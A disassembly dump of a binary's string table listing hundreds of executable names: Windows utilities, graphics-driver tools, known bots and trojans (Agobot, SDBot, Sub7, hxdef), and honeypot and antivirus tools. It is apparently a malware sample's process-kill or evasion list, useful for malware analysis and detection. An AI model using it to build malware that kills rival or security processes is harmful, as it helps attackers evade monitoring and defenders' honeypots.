aLabel_exe db 'label.exe',0 ; DATA XREF: .text:00448B10�o
align 4
aKrnl386_exe db 'krnl386.exe',0 ; DATA XREF: .text:00448B0C�o
aJview_exe db 'jview.exe',0 ; DATA XREF: .text:00448B08�o
align 4
aJdbgmgr_exe db 'jdbgmgr.exe',0 ; DATA XREF: .text:00448B04�o
aJavaws_exe db 'javaws.exe',0 ; DATA XREF: .text:00448B00�o
align 4
aJavaw_exe db 'javaw.exe',0 ; DATA XREF: .text:00448AFC�o
align 10h
aJava_exe db 'java.exe',0 ; DATA XREF: .text:00448AF8�o
align 4
aIpxroute_exe db 'ipxroute.exe',0 ; DATA XREF: .text:00448AF4�o
align 4
aIpv6_exe db 'ipv6.exe',0 ; DATA XREF: .text:00448AF0�o
align 4
aIpsec6_exe db 'ipsec6.exe',0 ; DATA XREF: .text:00448AEC�o
align 4
aIpconfig_exe db 'ipconfig.exe',0 ; DATA XREF: .text:00448AE8�o
align 4
aImapi_exe db 'imapi.exe',0 ; DATA XREF: .text:00448AE4�o
align 10h
aIexpress_exe db 'iexpress.exe',0 ; DATA XREF: .text:00448AE0�o
align 10h
aIe4uinit_exe db 'ie4uinit.exe',0 ; DATA XREF: .text:00448ADC�o
align 10h
aHostname_exe db 'hostname.exe',0 ; DATA XREF: .text:00448AD8�o
align 10h
aHelp_exe db 'help.exe',0 ; DATA XREF: .text:00448AD4�o
align 4
aGrpconv_exe db 'grpconv.exe',0 ; DATA XREF: .text:00448AD0�o
aGpupdate_exe db 'gpupdate.exe',0 ; DATA XREF: .text:00448ACC�o
align 4
aGpresult_exe db 'gpresult.exe',0 ; DATA XREF: .text:00448AC8�o
align 4
aGetmac_exe db 'getmac.exe',0 ; DATA XREF: .text:00448AC4�o
align 4
aGdi_exe db 'gdi.exe',0 ; DATA XREF: .text:00448AC0�o
aGb2312_uce db 'gb2312.uce',0 ; DATA XREF: .text:00448ABC�o
align 4
aFtp_exe db 'ftp.exe',0 ; DATA XREF: .text:00448AB8�o
aFsutil_exe db 'fsutil.exe',0 ; DATA XREF: .text:00448AB4�o
align 4
aFsquirt_exe db 'fsquirt.exe',0 ; DATA XREF: .text:00448AB0�o
aFreecell_exe db 'freecell.exe',0 ; DATA XREF: .text:00448AAC�o
align 4
aForcedos_exe db 'forcedos.exe',0 ; DATA XREF: .text:00448AA8�o
align 4
aFontview_exe db 'fontview.exe',0 ; DATA XREF: .text:00448AA4�o
align 4
aFltmc_exe db 'fltMc.exe',0 ; DATA XREF: .text:00448AA0�o
align 4
aFixmapi_exe db 'fixmapi.exe',0 ; DATA XREF: .text:00448A9C�o
aFinger_exe db 'finger.exe',0 ; DATA XREF: .text:00448A98�o
align 4
aFindstr_exe db 'findstr.exe',0 ; DATA XREF: .text:00448A94�o
aFind_exe db 'find.exe',0 ; DATA XREF: .text:00448A90�o
align 4
aFc_exe db 'fc.exe',0 ; DATA XREF: .text:00448A8C�o
align 4
aFastopen_exe db 'fastopen.exe',0 ; DATA XREF: .text:00448A88�o
align 4
aExtrac32_exe db 'extrac32.exe',0 ; DATA XREF: .text:00448A84�o
align 4
aExpand_exe db 'expand.exe',0 ; DATA XREF: .text:00448A80�o
align 4
aExe2bin_exe db 'exe2bin.exe',0 ; DATA XREF: .text:00448A7C�o
aEventvwr_exe db 'eventvwr.exe',0 ; DATA XREF: .text:00448A78�o
align 4
aEventtriggers_ db 'eventtriggers.exe',0 ; DATA XREF: .text:00448A74�o
align 4
aEventcreate_ex db 'eventcreate.exe',0 ; DATA XREF: .text:00448A70�o
aEudcedit_exe db 'eudcedit.exe',0 ; DATA XREF: .text:00448A6C�o
align 4
aEsentutl_exe db 'esentutl.exe',0 ; DATA XREF: .text:00448A68�o
align 4
aEdlin_exe db 'edlin.exe',0 ; DATA XREF: .text:00448A64�o
align 4
aDxdiag_exe db 'dxdiag.exe',0 ; DATA XREF: .text:00448A60�o
align 10h
aDwwin_exe db 'dwwin.exe',0 ; DATA XREF: .text:00448A5C�o
align 4
aDvdupgrd_exe db 'dvdupgrd.exe',0 ; DATA XREF: .text:00448A58�o
align 4
aDvdplay_exe db 'dvdplay.exe',0 ; DATA XREF: .text:00448A54�o
aDumprep_exe db 'dumprep.exe',0 ; DATA XREF: .text:00448A50�o
aDrwtsn32_exe db 'drwtsn32.exe',0 ; DATA XREF: .text:00448A4C�o
align 4
aDrwatson_exe db 'drwatson.exe',0 ; DATA XREF: .text:00448A48�o
align 4
aDriverquery_ex db 'driverquery.exe',0 ; DATA XREF: .text:00448A44�o
aDpvsetup_exe db 'dpvsetup.exe',0 ; DATA XREF: .text:00448A40�o
align 4
aDpnsvr_exe db 'dpnsvr.exe',0 ; DATA XREF: .text:00448A3C�o
align 10h
aDplaysvr_exe db 'dplaysvr.exe',0 ; DATA XREF: .text:00448A38�o
align 10h
aDosx_exe db 'dosx.exe',0 ; DATA XREF: .text:00448A34�o
align 4
aDoskey_exe db 'doskey.exe',0 ; DATA XREF: .text:00448A30�o
align 4
aDmremote_exe db 'dmremote.exe',0 ; DATA XREF: .text:00448A2C�o
align 4
aDmadmin_exe db 'dmadmin.exe',0 ; DATA XREF: .text:00448A28�o
aDllhst3g_exe db 'dllhst3g.exe',0 ; DATA XREF: .text:00448A24�o
align 4
aDllhost_exe db 'dllhost.exe',0 ; DATA XREF: .text:00448A20�o
aDiskperf_exe db 'diskperf.exe',0 ; DATA XREF: .text:00448A1C�o
align 10h
aDiskpart_exe db 'diskpart.exe',0 ; DATA XREF: .text:00448A18�o
align 10h
aDiantz_exe db 'diantz.exe',0 ; DATA XREF: .text:00448A14�o
align 4
aDfrgntfs_exe db 'dfrgntfs.exe',0 ; DATA XREF: .text:00448A10�o
align 4
aDfrgfat_exe db 'dfrgfat.exe',0 ; DATA XREF: .text:00448A0C�o
aDefrag_exe db 'defrag.exe',0 ; DATA XREF: .text:00448A08�o
align 4
aDebug_exe db 'debug.exe',0 ; DATA XREF: .text:00448A04�o
align 10h
aDdeshare_exe db 'ddeshare.exe',0 ; DATA XREF: .text:00448A00�o
align 10h
aDcomcnfg_exe db 'dcomcnfg.exe',0 ; DATA XREF: .text:004489FC�o
align 10h
aCtfmon_exe db 'ctfmon.exe',0 ; DATA XREF: .text:004489F8�o
align 4
aCsrss_exe db 'csrss.exe',0 ; DATA XREF: .text:004489F4�o
align 4
aCscript_exe db 'cscript.exe',0 ; DATA XREF: .text:004489F0�o
aConvert_exe db 'convert.exe',0 ; DATA XREF: .text:004489EC�o
aControl_exe db 'control.exe',0 ; DATA XREF: .text:004489E8�o
aConime_exe db 'conime.exe',0 ; DATA XREF: .text:004489E4�o
align 4
aCompact_exe db 'compact.exe',0 ; DATA XREF: .text:004489E0�o
aComp_exe db 'comp.exe',0 ; DATA XREF: .text:004489DC�o
align 10h
aCmstp_exe db 'cmstp.exe',0 ; DATA XREF: .text:004489D8�o
align 4
aCmmon32_exe db 'cmmon32.exe',0 ; DATA XREF: .text:004489D4�o
aCmdl32_exe db 'cmdl32.exe',0 ; DATA XREF: .text:004489D0�o
align 4
aClspack_exe db 'clspack.exe',0 ; DATA XREF: .text:004489C8�o
aClipsrv_exe db 'clipsrv.exe',0 ; DATA XREF: .text:004489C4�o
aClipbrd_exe db 'clipbrd.exe',0 ; DATA XREF: .text:004489C0�o
aCliconfg_exe db 'cliconfg.exe',0 ; DATA XREF: .text:004489BC�o
align 4
aCleanmgr_exe db 'cleanmgr.exe',0 ; DATA XREF: .text:004489B8�o
align 4
aCkcnv_exe db 'ckcnv.exe',0 ; DATA XREF: .text:004489B4�o
align 4
aCisvc_exe db 'cisvc.exe',0 ; DATA XREF: .text:004489B0�o
align 10h
aCipher_exe db 'cipher.exe',0 ; DATA XREF: .text:004489AC�o
align 4
aCidaemon_exe db 'cidaemon.exe',0 ; DATA XREF: .text:004489A8�o
align 4
aChkntfs_exe db 'chkntfs.exe',0 ; DATA XREF: .text:004489A4�o
aChkdsk_exe db 'chkdsk.exe',0 ; DATA XREF: .text:004489A0�o
align 4
aChcfg_exe db 'ChCfg.exe',0 ; DATA XREF: .text:0044899C�o
align 10h
aCharmap_exe db 'charmap.exe',0 ; DATA XREF: .text:00448998�o
aCalc_exe db 'calc.exe',0 ; DATA XREF: .text:00448994�o
align 4
aCacls_exe db 'cacls.exe',0 ; DATA XREF: .text:00448990�o
align 4
aBootvrfy_exe db 'bootvrfy.exe',0 ; DATA XREF: .text:0044898C�o
align 4
aBootok_exe db 'bootok.exe',0 ; DATA XREF: .text:00448988�o
align 10h
aBootcfg_exe db 'bootcfg.exe',0 ; DATA XREF: .text:00448984�o
aBlastcln_exe db 'blastcln.exe',0 ; DATA XREF: .text:00448980�o
align 4
aAutolfn_exe db 'autolfn.exe',0 ; DATA XREF: .text:0044897C�o
aAutofmt_exe db 'autofmt.exe',0 ; DATA XREF: .text:00448978�o
aAutoconv_exe db 'autoconv.exe',0 ; DATA XREF: .text:00448974�o
align 4
aAutochk_exe db 'autochk.exe',0 ; DATA XREF: .text:00448970�o
aAuditusr_exe db 'auditusr.exe',0 ; DATA XREF: .text:0044896C�o
align 10h
aAttrib_exe db 'attrib.exe',0 ; DATA XREF: .text:00448968�o
align 4
aAtmadm_exe db 'atmadm.exe',0 ; DATA XREF: .text:00448964�o
align 4
aAti2mdxx_exe db 'Ati2mdxx.exe',0 ; DATA XREF: .text:00448960�o
align 4
aAti2evxx_exe db 'ati2evxx.exe',0 ; DATA XREF: .text:0044895C�o
; .text:00448EA4�o
align 4
aAt_exe db 'at.exe',0 ; DATA XREF: .text:00448958�o
align 10h
aAsr_pfu_exe db 'asr_pfu.exe',0 ; DATA XREF: .text:00448954�o
aAsr_ldm_exe db 'asr_ldm.exe',0 ; DATA XREF: .text:00448950�o
aAsr_fmt_exe db 'asr_fmt.exe',0 ; DATA XREF: .text:0044894C�o
aArp_exe db 'arp.exe',0 ; DATA XREF: .text:00448948�o
aAppend_exe db 'append.exe',0 ; DATA XREF: .text:00448944�o
align 4
aAlg_exe db 'alg.exe',0 ; DATA XREF: .text:00448940�o
aAhui_exe db 'ahui.exe',0 ; DATA XREF: .text:0044893C�o
align 4
aActmovie_exe db 'actmovie.exe',0 ; DATA XREF: .text:00448938�o
align 4
aAccwiz_exe db 'accwiz.exe',0 ; DATA XREF: .text:00448934�o
align 4
aHdashcut_exe db 'HDAShCut.exe',0 ; DATA XREF: .text:00448930�o
; .text:00448F74�o
align 4
aKeystone_exe db 'keystone.exe',0 ; DATA XREF: .text:0044892C�o
align 4
aNwiz_exe db 'nwiz.exe',0 ; DATA XREF: .text:00448928�o
align 4
aNvcplui_exe db 'nvcplui.exe',0 ; DATA XREF: .text:00448924�o
aNvdspsch_exe db 'nvdspsch.exe',0 ; DATA XREF: .text:00448920�o
align 10h
aNvcolor_exe db 'nvcolor.exe',0 ; DATA XREF: .text:0044891C�o
aNvappbar_exe db 'nvappbar.exe',0 ; DATA XREF: .text:00448918�o
align 4
aNvudisp_exe db 'nvudisp.exe',0 ; DATA XREF: .text:00448914�o
aNvsvc32_exe db 'nvsvc32.exe',0 ; DATA XREF: .text:00448910�o
aNvuninst_exe db 'NVUNINST.EXE',0 ; DATA XREF: .text:0044890C�o
align 4
aSview_exe db 'sview.exe',0 ; DATA XREF: .text:00448908�o
align 10h
aNview_exe db 'nview.exe',0 ; DATA XREF: .text:00448904�o
align 4
aWmsoft_exe db 'wmsoft*.exe',0 ; DATA XREF: .text:00448900�o
; .text:00448F68�o ...
aAsr__exe db 'asr_*.exe',0 ; DATA XREF: .text:004488FC�o
; .text:00448F64�o ...
align 4
aSysupd_exe db 'SYSUPD.EXE',0 ; DATA XREF: .text:004488F0�o
align 10h
aSvshost_exe db 'SVSHOST.EXE',0 ; DATA XREF: .text:004488E4�o
aSvchostc_exe db 'SVCHOSTC.EXE',0 ; DATA XREF: .text:004488DC�o
align 4
aMssmpp_exe db 'MSSMPP.EXE',0 ; DATA XREF: .text:004488D4�o
align 4
aWindows12_exe db 'WINDOWS12.EXE',0 ; DATA XREF: .text:004488D0�o
align 4
aDup_exe db 'DUP.EXE',0 ; DATA XREF: .text:004488C8�o
aNsecurity_exe db 'NSECURITY.EXE',0 ; DATA XREF: .text:004488C4�o
align 10h
aInssvc_exe db 'INSSVC.EXE',0 ; DATA XREF: .text:004488BC�o
align 4
aDog_bat db 'DOG.BAT',0 ; DATA XREF: .text:004488B8�o
aMsnet_bat db 'MSNET.BAT',0 ; DATA XREF: .text:004488B0�o
align 10h
aRootkit2_exe db 'ROOTKIT2.EXE',0 ; DATA XREF: .text:004488AC�o
align 10h
aRun_bot_bat_ex db 'RUN_BOT.BAT.EXE',0 ; DATA XREF: .text:004488A8�o
aLogoner_exe db 'LOGONER.EXE',0 ; DATA XREF: .text:004488A4�o
aLogdec_exe db 'LOGDEC.EXE',0 ; DATA XREF: .text:004488A0�o
align 4
aWebxgrab_exe db 'WEBXGRAB.EXE',0 ; DATA XREF: .text:0044889C�o
align 4
aGg_exe db 'GG.EXE',0 ; DATA XREF: .text:00448898�o
align 10h
aWolff_exe db 'WOLFF.EXE',0 ; DATA XREF: .text:00448890�o
align 4
aHz_exe db 'HZ.EXE',0 ; DATA XREF: .text:0044888C�o
align 4
aWinpga_exe db 'WINPGA.EXE',0 ; DATA XREF: .text:00448888�o
align 10h
aWqrtuhx_exe db 'WQRTUHX.EXE',0 ; DATA XREF: .text:00448884�o
aDmi_exe db 'DMI.EXE',0 ; DATA XREF: .text:00448880�o
aRspool_exe db 'RSPOOL.EXE',0 ; DATA XREF: .text:0044887C�o
align 10h
aIrb_exe db 'IRB.EXE',0 ; DATA XREF: .text:00448878�o
aV1rg1n_exe db 'V1RG1N.EXE',0 ; DATA XREF: .text:00448874�o
align 4
aRopnc_exe db 'ROPNC.EXE',0 ; DATA XREF: .text:00448870�o
align 10h
aXgun_exe db 'XGUN.EXE',0 ; DATA XREF: .text:0044886C�o
align 4
aAdv693_exe db 'ADV693.EXE',0 ; DATA XREF: .text:00448868�o
align 4
aJssa_exe db 'JSSA.EXE',0 ; DATA XREF: .text:00448864�o
align 4
aV1rgf_exe db 'V1RGF.EXE',0 ; DATA XREF: .text:00448860�o
align 10h
aU_exe db 'U.EXE',0 ; DATA XREF: .text:0044885C�o
align 4
aV1rg1n_exe_0 db 'V1Rg1N.EXE',0 ; DATA XREF: .text:00448858�o
align 4
aKa6ber_exe db 'KA6BER.EXE',0 ; DATA XREF: .text:00448854�o
align 10h
aTest_exe db 'TEST.EXE',0 ; DATA XREF: .text:00448850�o
align 4
aScans_exe db 'SCANS.EXE',0 ; DATA XREF: .text:0044884C�o
align 4
aSecuraq_exe db 'SECURAQ.EXE',0 ; DATA XREF: .text:00448848�o
aPs2m_exe db 'PS2M.EXE',0 ; DATA XREF: .text:00448844�o
align 10h
aOurnik_exe db 'OURNIK.EXE',0 ; DATA XREF: .text:00448840�o
align 4
aO1o2o3o4_exe db 'O1O2O3O4.EXE',0 ; DATA XREF: .text:0044883C�o
align 4
aOf_exe db 'OF.EXE',0 ; DATA XREF: .text:00448838�o
align 4
aTamer_bat_exe db 'TAMER.BAT.EXE',0 ; DATA XREF: .text:00448834�o
align 4
a5h7h8v6b1c5_ex db '5H7H8V6B1C5.EXE',0 ; DATA XREF: .text:00448830�o
aDual_exe db 'DUAL.EXE',0 ; DATA XREF: .text:0044882C�o
align 10h
aNxm_exe db 'NXM.EXE',0 ; DATA XREF: .text:00448828�o
aGt_exe db 'GT.EXE',0 ; DATA XREF: .text:00448824�o
align 10h
aNope_exe db 'NOPE.EXE',0 ; DATA XREF: .text:00448820�o
align 4
aM_exe db 'M.EXE',0 ; DATA XREF: .text:0044881C�o
align 4
aLoadadv735_exe db 'LOADADV735.EXE',0 ; DATA XREF: .text:00448818�o
align 4
aAbo_exe db 'ABO.EXE',0 ; DATA XREF: .text:00448814�o
aLam_exe db 'LAM.EXE',0 ; DATA XREF: .text:00448810�o
aBox_exe db 'BOX.EXE',0 ; DATA XREF: .text:0044880C�o
aHtran_v1_exe db 'HTRAN_V1.EXE',0 ; DATA XREF: .text:00448804�o
align 4
aRserver_exe db 'RSERVER.EXE',0 ; DATA XREF: .text:00448800�o
aJoined_exe db 'JOINED.EXE',0 ; DATA XREF: .text:004487FC�o
align 4
aHookiat_exe db 'HOOKIAT.EXE',0 ; DATA XREF: .text:004487F8�o
aUay_exe db 'UAY.EXE',0 ; DATA XREF: .text:004487F4�o
aOwnt_exe db 'OWNT.EXE',0 ; DATA XREF: .text:004487F0�o
align 4
aWnetwork_exe db 'WNETWORK.EXE',0 ; DATA XREF: .text:004487EC�o
align 4
aWishs_exewsemg db 'WISHS.EXEWSEMGR.EXE',0 ; DATA XREF: .text:004487E8�o
aW32sim_exe db 'W32SIM.EXE',0 ; DATA XREF: .text:004487E4�o
align 4
aDisk10_exe db 'DISK10.EXE',0 ; DATA XREF: .text:004487E0�o
align 10h
aWinclean_exe db 'WINCLEAN.EXE',0 ; DATA XREF: .text:004487DC�o
align 10h
aWinuppd_exe db 'WINUPPD.EXE',0 ; DATA XREF: .text:004487D8�o
aIsass_exe db 'ISASS.EXE',0 ; DATA XREF: .text:004487D4�o
align 4
aWiniogon_exe db 'WINIOGON.EXE',0 ; DATA XREF: .text:004487D0�o
align 4
aSpooisv_exe db 'SPOOISV.EXE',0 ; DATA XREF: .text:004487CC�o
aVideoati0_exe db 'VIDEOATI0.EXE',0 ; DATA XREF: .text:004487C8�o
align 4
aIs67538_exe db 'IS67538.EXE',0 ; DATA XREF: .text:004487C4�o
aBlkl_exe db 'BLKL.EXE',0 ; DATA XREF: .text:004487C0�o
; .text:00448808�o
align 4
aBulk_exe db 'BULK.EXE',0 ; DATA XREF: .text:004487BC�o
align 4
aMswdns32_exe db 'MSWDNS32.EXE',0 ; DATA XREF: .text:004487B8�o
align 4
aWinpkr_exe db 'WINPKR.EXE',0 ; DATA XREF: .text:004487B4�o
align 4
aWinsnte_exe db 'WINSNTE.EXE',0 ; DATA XREF: .text:004487B0�o
aEbay_exe db 'EBAY.EXE',0 ; DATA XREF: .text:004487AC�o
align 4
aWanmpsvc_exe db 'WANMPSVC.EXE',0 ; DATA XREF: .text:004487A8�o
align 4
aWebmsn_exe db 'WEBMSN.EXE',0 ; DATA XREF: .text:004487A4�o
align 4
aSysmgr64_exe db 'SYSMGR64.EXE',0 ; DATA XREF: .text:004487A0�o
align 4
aWmism23_exe db 'WMISM23.EXE',0 ; DATA XREF: .text:0044879C�o
aWinupdaterar_e db 'WINUPDATERAR.EXE',0 ; DATA XREF: .text:00448798�o
align 4
aWinsocket_exe db 'WINSOCKET.EXE',0 ; DATA XREF: .text:00448794�o
align 4
aSsql_exe db 'SSQL.EXE',0 ; DATA XREF: .text:00448790�o
align 4
aMssql32_exe db 'MSSQL32.EXE',0 ; DATA XREF: .text:0044878C�o
aSxot_exe db 'SXOT.EXE',0 ; DATA XREF: .text:00448788�o
align 4
aAkbot_exe db 'AKBOT.EXE',0 ; DATA XREF: .text:00448784�o
align 4
aDc_exe db 'DC.EXE',0 ; DATA XREF: .text:00448780�o
align 10h
aDcz_exe db 'DCZ.EXE',0 ; DATA XREF: .text:0044877C�o
aDcomd_exe db 'DCOMD.EXE',0 ; DATA XREF: .text:00448778�o
align 4
aUniversal_exe db 'UNIVERSAL.EXE',0 ; DATA XREF: .text:00448774�o
align 4
aUtils32_exe db 'UTILS32.EXE',0 ; DATA XREF: .text:00448770�o
aR00tkit_exe db 'R00TKIT.EXE',0 ; DATA XREF: .text:0044876C�o
aRk_exe db 'RK.EXE',0 ; DATA XREF: .text:00448768�o
align 4
aRootkit_exe db 'ROOTKIT.EXE',0 ; DATA XREF: .text:00448764�o
aT00lkit_exe db 'T00LKIT.EXE',0 ; DATA XREF: .text:00448760�o
aUpdates_exe db 'UPDATES.EXE',0 ; DATA XREF: .text:0044875C�o
aExe32_exe db 'EXE32.EXE',0 ; DATA XREF: .text:00448758�o
align 4
aExe_exe db 'EXE.EXE',0 ; DATA XREF: .text:00448754�o
aDllhst_exe db 'DLLHST.EXE',0 ; DATA XREF: .text:0044874C�o
align 4
aWindll_exe db 'WINDLL.EXE',0 ; DATA XREF: .text:00448748�o
align 4
aGsec_exe db 'GSEC.EXE',0 ; DATA XREF: .text:00448744�o
align 10h
aRunbatch_exe db 'RUNBATCH.EXE',0 ; DATA XREF: .text:00448740�o
align 10h
aLoader32_exe db 'LOADER32.EXE',0 ; DATA XREF: .text:0044873C�o
align 10h
aWebex_exe db 'WEBEX.EXE',0 ; DATA XREF: .text:00448738�o
align 4
aDowner_exe db 'DOWNER.EXE',0 ; DATA XREF: .text:00448734�o
align 4
aUrx_exe db 'URX.EXE',0 ; DATA XREF: .text:00448730�o
aPnp_exe db 'PNP.EXE',0 ; DATA XREF: .text:0044872C�o
aAsn_exe db 'ASN.EXE',0 ; DATA XREF: .text:00448728�o
aUrxbot_exe db 'URXBOT.EXE',0 ; DATA XREF: .text:00448724�o
align 4
aForbot_exe db 'FORBOT.EXE',0 ; DATA XREF: .text:00448720�o
align 4
aAgobotsvc_exe db 'AGOBOTSVC.EXE',0 ; DATA XREF: .text:0044871C�o
align 4
aWonk_exe db 'WONK.EXE',0 ; DATA XREF: .text:00448718�o
align 4
aPb_exe db 'PB.EXE',0 ; DATA XREF: .text:00448714�o
align 4
aAg32_exe db 'AG32.EXE',0 ; DATA XREF: .text:00448710�o
align 4
aAgo_exe db 'AGO.EXE',0 ; DATA XREF: .text:00448708�o
aA_exe db 'A.EXE',0 ; DATA XREF: .text:00448704�o
; .text:00448894�o
align 4
aPhatbot_exe db 'PHATBOT.EXE',0 ; DATA XREF: .text:00448700�o
aAgobot3_exe db 'AGOBOT3.EXE',0 ; DATA XREF: .text:004486FC�o
aAgobot_exe db 'AGOBOT.EXE',0 ; DATA XREF: .text:004486F8�o
align 4
aSyst3m33r_exe db 'SYST3M33R.EXE',0 ; DATA XREF: .text:004486F4�o
align 4
aWebdownloader_ db 'WEBDOWNLOADER.EXE',0 ; DATA XREF: .text:004486F0�o
align 10h
aWebx_exe db 'WEBX.EXE',0 ; DATA XREF: .text:004486EC�o
align 4
aXftp_exe db 'XFTP.EXE',0 ; DATA XREF: .text:004486E8�o
align 4
aWinnet_exe db 'WINNET.EXE',0 ; DATA XREF: .text:004486E4�o
align 4
aWinreg32_exe db 'WINREG32.EXE',0 ; DATA XREF: .text:004486E0�o
align 4
aConvertxdccfil db 'CONVERTXDCCFILE.EXE',0 ; DATA XREF: .text:004486DC�o
; .text:004488C0�o
aMsserv_exe db 'MSSERV.EXE',0 ; DATA XREF: .text:004486D8�o
align 4
aS0cks_exe db 'S0CKS.EXE',0 ; DATA XREF: .text:004486D4�o
align 10h
aSockets_exe db 'SOCKETS.EXE',0 ; DATA XREF: .text:004486D0�o
aSox_exe db 'SOX.EXE',0 ; DATA XREF: .text:004486CC�o
aSocks_exe db 'SOCKS.EXE',0 ; DATA XREF: .text:004486C8�o
align 10h
aClass101_exe db 'CLASS101.EXE',0 ; DATA XREF: .text:004486C4�o
align 10h
a101_exe db '101.EXE',0 ; DATA XREF: .text:004486C0�o
aMsn_exe db 'MSN.EXE',0 ; DATA XREF: .text:004486BC�o
aHax_exe db 'HAX.EXE',0 ; DATA XREF: .text:004486B8�o
aT_bat db 'T.BAT',0 ; DATA XREF: .text:004486B4�o
align 10h
aSdbot05c_exe db 'SDBOT05C.EXE',0 ; DATA XREF: .text:004486B0�o
align 10h
aSdbot05b_exe db 'SDBOT05B.EXE',0 ; DATA XREF: .text:004486AC�o
align 10h
aSd_exe db 'SD.EXE',0 ; DATA XREF: .text:004486A8�o
align 4
aSdbot_exe db 'SDBOT.EXE',0 ; DATA XREF: .text:004486A4�o
align 4
aIrxdcc_exe db 'IRXDCC.EXE',0 ; DATA XREF: .text:004486A0�o
align 10h
aOffer_exe db 'OFFER.EXE',0 ; DATA XREF: .text:0044869C�o
align 4
aIrbot_exe db 'IRBOT.EXE',0 ; DATA XREF: .text:00448698�o
align 4
aIroffer_exe db 'IROFFER.EXE',0 ; DATA XREF: .text:00448694�o
aRcc_exe db 'RCC.EXE',0 ; DATA XREF: .text:00448690�o
aWinmrt32_exe db 'WINMRT32.EXE',0 ; DATA XREF: .text:0044868C�o
align 4
aWinmrt_exe db 'WINMRT.EXE',0 ; DATA XREF: .text:00448688�o
align 4
aAntispy_exe db 'ANTISPY.EXE',0 ; DATA XREF: .text:00448684�o
aMsantispy_exe db 'MSANTISPY.EXE',0 ; DATA XREF: .text:00448680�o
align 4
aDrweb32_exe db 'DRWEB32.EXE',0 ; DATA XREF: .text:0044867C�o
aKeylogg_exe db 'KEYLOGG.EXE',0 ; DATA XREF: .text:00448678�o
aKeylog_exe db 'KEYLOG.EXE',0 ; DATA XREF: .text:00448674�o
align 4
aKeylogger_exe db 'KEYLOGGER.EXE',0 ; DATA XREF: .text:00448670�o
align 4
aRdrbs073_exe db 'RDRBS073.EXE',0 ; DATA XREF: .text:00448668�o
align 4
aBdcli073_exe db 'BDCLI073.EXE',0 ; DATA XREF: .text:00448664�o
align 4
aHxdef073_exe db 'HXDEF073.EXE',0 ; DATA XREF: .text:00448660�o
align 4
aHxgold_exe db 'HXGOLD.EXE',0 ; DATA XREF: .text:0044865C�o
align 4
aHxdofena_exe db 'HXDOFENA.EXE',0 ; DATA XREF: .text:00448658�o
; .text:0044866C�o ...
align 4
aRdrbs100_exe db 'RDRBS100.EXE',0 ; DATA XREF: .text:00448654�o
align 4
aBdcli100_exe db 'BDCLI100.EXE',0 ; DATA XREF: .text:00448650�o
align 4
aHxdef100_exe db 'HXDEF100.EXE',0 ; DATA XREF: .text:0044864C�o
align 4
aXd_exe db 'XD.EXE',0 ; DATA XREF: .text:00448644�o
align 4
aXdcckit_exe db 'XDCCKIT.EXE',0 ; DATA XREF: .text:00448640�o
aKit_exe db 'KIT.EXE',0 ; DATA XREF: .text:0044863C�o
aRunthis_exe db 'RUNTHIS.EXE',0 ; DATA XREF: .text:00448638�o
aDiabl0_exe db 'DIABL0.EXE',0 ; DATA XREF: .text:00448634�o
align 4
aDiablo_exe db 'DIABLO.EXE',0 ; DATA XREF: .text:00448630�o
align 4
a6_exe db '6.EXE',0 ; DATA XREF: .text:0044862C�o
align 4
a1_exe db '1.EXE',0 ; DATA XREF: .text:00448628�o
align 4
aOwned_exe db 'OWNED.EXE',0 ; DATA XREF: .text:00448624�o
align 10h
aOmfglol_exe db 'OMFGLOL.EXE',0 ; DATA XREF: .text:00448620�o
aDoor_exe db 'DOOR.EXE',0 ; DATA XREF: .text:0044861C�o
align 4
aBd_exe db 'BD.EXE',0 ; DATA XREF: .text:00448618�o
align 10h
aSub7_exe db 'SUB7.EXE',0 ; DATA XREF: .text:00448614�o
align 4
aTrojan_exe db 'TROJAN.EXE',0 ; DATA XREF: .text:00448610�o
align 4
aHoney_exe db 'HONEY.EXE',0 ; DATA XREF: .text:0044860C�o
align 4
aRoo32_exe db 'ROO32.EXE',0 ; DATA XREF: .text:00448608�o
align 10h
aRoo_exe db 'ROO.EXE',0 ; DATA XREF: .text:00448604�o
aSysd32_exe db 'SYSD32.EXE',0 ; DATA XREF: .text:00448600�o
align 4
aAntibotty_exe db 'ANTIBOTTY.EXE',0 ; DATA XREF: .text:004485FC�o
align 4
aSelebek_exe db 'SELEBEK.EXE',0 ; DATA XREF: .text:004485F8�o
aSebek_exe db 'SEBEK.EXE',0 ; DATA XREF: .text:004485F4�o
align 4
aHoneywall_exe db 'HONEYWALL.EXE',0 ; DATA XREF: .text:004485F0�o
align 4
aHoneyd_exe db 'HONEYD.EXE',0 ; DATA XREF: .text:004485EC�o
align 4
aVirus32_exe db 'VIRUS32.EXE',0 ; DATA XREF: .text:004485E8�o
aVirus_exe db 'VIRUS.EXE',0 ; DATA XREF: .text:004485E4�o
align 10h
aTq_exe db 'TQ.EXE',0 ; DATA XREF: .text:004485E0�o
align 4
aBeast_exe db 'BEAST.EXE',0 ; DATA XREF: .text:004485DC�o
align 4
aAcc3pt_exe db 'ACC3PT.EXE',0 ; DATA XREF: .text:004485D8�o
align 10h
aMykralor_exe db 'MYKRALOR.EXE',0 ; DATA XREF: .text:004485D4�o
align 10h
aKralor_exehaxo db 'KRALOR.EXEHAXOR.EXE',0 ; DATA XREF: .text:004485D0�o
aWinslave_exe db 'WINSLAVE.EXE',0 ; DATA XREF: .text:004485CC�o
align 4
aSlave32_exe db 'SLAVE32.EXE',0 ; DATA XREF: .text:004485C8�o
aSlave_exe db 'SLAVE.EXE',0 ; DATA XREF: .text:004485C4�o
align 4
aWinmaster_exe db 'WINMASTER.EXE',0 ; DATA XREF: .text:004485C0�o
align 4
aDftpd_exe db 'DFTPD.EXE',0 ; DATA XREF: .text:004485BC�o
align 4
aTemp_exe db 'TEMP.EXE',0 ; DATA XREF: .text:004485B8�o
align 4
aStub_exe db 'STUB.EXE',0 ; DATA XREF: .text:004485B4�o
align 10h
aWrapper_exe db 'WRAPPER.EXE',0 ; DATA XREF: .text:004485B0�o
aRdr32_exe db 'RDR32.EXE',0 ; DATA XREF: .text:004485AC�o
align 4
aCiao_exe db 'CIAO.EXE',0 ; DATA XREF: .text:004485A8�o
align 4
aXtc_exe db 'XTC.EXE',0 ; DATA XREF: .text:004485A4�o
aWsg32_exe db 'WSG32.EXE',0 ; DATA XREF: .text:004485A0�o
; .text:004488B4�o
align 4
aRadmin22_exe db 'RADMIN22.EXE',0 ; DATA XREF: .text:0044859C�o
align 4
aRadmin21_exe db 'RADMIN21.EXE',0 ; DATA XREF: .text:00448598�o
align 4
aRview_exe db 'RVIEW.EXE',0 ; DATA XREF: .text:00448594�o
align 4
aNi_exe db 'NI.EXE',0 ; DATA XREF: .text:00448590�o
align 4
